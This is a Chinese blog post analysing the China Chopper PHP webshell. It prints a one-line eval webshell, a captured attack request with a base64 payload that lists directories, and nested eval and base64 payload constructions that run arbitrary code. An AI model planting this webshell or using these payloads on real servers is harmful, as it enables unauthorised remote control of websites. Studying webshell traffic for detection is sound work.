1. 程式人生 > >php菜刀分析學習

php菜刀分析學習

amp lua 一個 pat 菜刀 erer apk log 工具

這裏以eval為例

我們知道, php中的eval能把字符串當代碼執行:

eval(‘phpcode‘);

註意, 這裏的代碼要有分號結尾, 我們測試:

我們創建一個最簡單的SHELL:

<?php
eval($_POST[‘a‘]);

在post數據位置發送:

a=phpinfo()

技術分享

可以看到phpinfo()並沒有執行。

原來原因是要加 ; 號結速一個語句, 像php語法一樣, 語句後面要加 ; 號。

這裏還有一個問題就是, 輸入的 a=phpinfo(); 不需要用單或雙引號括起來:

技術分享

再回到eval, 我們加多層eval看看:

<?php
eval(eval(eval($_POST[a])));

看到效果是一樣的:

技術分享

我們創建一個簡單WEBSHELL, 打開抓包工具抓菜刀包, 抓到的發送包是這樣的:

POST /2.php HTTP/1.1
Cache-Control: no-cache
X-Forwarded-For: 226.60.187.9
Referer: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host
: localhost Content-Length: 738 Connection: Close a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=RDpcXHBocFN0dWR5XFxXV1dcXA%3D%3D

單純地看上面的POST包, 在沒有base64解密前提下, 可以明顯的看到 菜刀會另外創造一個post數據(上圖中的是z0)發送回來給a。

我們可以得知, 菜刀發送的包, 有點像這樣:

<?php
eval($_POST[a]);
#post:
#$_POST[a] = 另一個post數據
#$_POST[a] = $_POST[b]
#傳入的$_POST[a]=$_POST[b]=b的內容

也就是說, 我們發送包時, 可以這樣構造一下:

a=$_POST[b]&b=phpinfo

這樣就相當於是:

a=phpinfo

記得我們上面說過, 要加 ; 號, 不用加單雙引號:

a=$_POST[b];&b=phpinfo()

這一個數據, 就相當於:

a=phpinfo();
#$_POST[b]替換成了: phpinfo()

我們測試一下效果:

技術分享

可以看到, 並沒有執行 phpinfo() 函數。

為什麽呢?

用一個小例子來說明為什麽:

echo ‘post[a]:‘.$_POST[a]."<br />";
echo ‘post[b]:‘.$_POST[b];

發送數據後如下所示:

技術分享

可以看到, a 的值是 $_POST[b]; , 但是這個 $_POST[b]; 只是一個單純字符串而已, 而這個字符串並未被當成php代碼解釋。

相當於我們創建了一個這樣的代碼:

<?php
‘$_POST[b]‘;

這樣的參數肯定會出錯, 也相當於你創建了一個這樣的代碼:

eval(‘abcdefg‘);

eval要求是php代碼形式的字符串, 所以, 下面這樣就是合法的:

eval(‘echo "abcdefg";‘);

最後我們可以構造這樣的代碼:

eval(‘eval("$_POST[b]");‘)

這樣phpinfo函數就能正常運行了。

技術分享

把eval加進代碼裏:

技術分享

有一點要註意的就是 $_POST[b]中的PHP代碼參數要加 ; 號, 因為 $_POST[a] 裏的eval要用到, 而 $_POST[a]裏的php代碼也要加 ; 號, 因為源碼裏的eval也要用到。

在 $_POST[a]的位置我們也可以用base64編碼數據, 這樣 $_POST[b]的數據就可以很好的正常發送了:

技術分享

總之, a中的post數據中的eval目的是把他的值 $_POST[b] 解釋。

我們其實可以在發送數據位置單單用一個a=post數據就行了。

<?php
eval($_post[a]);

在接收後我們可以用自已相要的方式加解密(如果你數據有加密的話):

<?php
eval(base64_decode($_POST[a]));
#post
#a=cGhwaW5mbygpOw==

那個java的C刀就是這樣的做法。

php菜刀分析學習